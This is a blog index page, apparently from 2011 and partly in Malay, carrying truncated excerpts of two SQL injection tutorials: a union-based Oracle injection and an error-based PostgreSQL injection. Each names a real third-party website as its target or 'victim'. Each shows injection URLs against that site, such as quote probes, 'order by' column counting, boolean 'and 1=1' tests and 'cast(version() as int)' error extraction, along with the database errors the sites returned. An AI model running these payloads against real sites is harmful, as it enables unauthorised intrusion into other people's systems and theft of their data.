Monday, May 30, 2011

Oracle Database Injection

So we gonna play with Oracle Database Injection our target :http://www3.inn.clFirst using Union Based injection 1 - Kita mulakan check vuln dgn letak single quote ' Code:http://www3.inn.cl/noticias/index.php?id=2372'jika ade vuln,ia akan keluarkan error : Quote: Warning: ociparse(): OCIParse: ORA-01756: quoted string not properly terminated in /home/www/html/inn/noticias/_index.php on line 5Kita dapat lihat ORA-01756,dan dgn segera tahulah ini oracle injection kn? 2 - Kita cari bilangan column mcm biasa. order by 1-- sampai error dan dari web ni,column yg ade = 9 3 - so kita teruskan dgn union injection kita Code:http://www3.inn.cl/noticias/index.php?id=2372...


Error Based PosgreSQL Injection

This is a demo on how to attack a website with error based Posgresql Injection. I take from my 0day web apps that just published as an example. our victim is http://www.creatop.com.cntry to put ' at the url. Code:http://www.creatop.com.cn/index.cfm?MenuID=80'The output Code:ERROR: syntax error at or near "''" When I try to use Code:http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=1it will return TRUE page. while when i'm using Code:http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=0FALSE page replied. So, I know this is either blind sql or error based sql. I try using error based method. Code:http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)Owh Lucky!! it works! Posgresql! So proceed to get the table name. Same like we injecting other vulnerable website,posgresql...


Pages 81234 »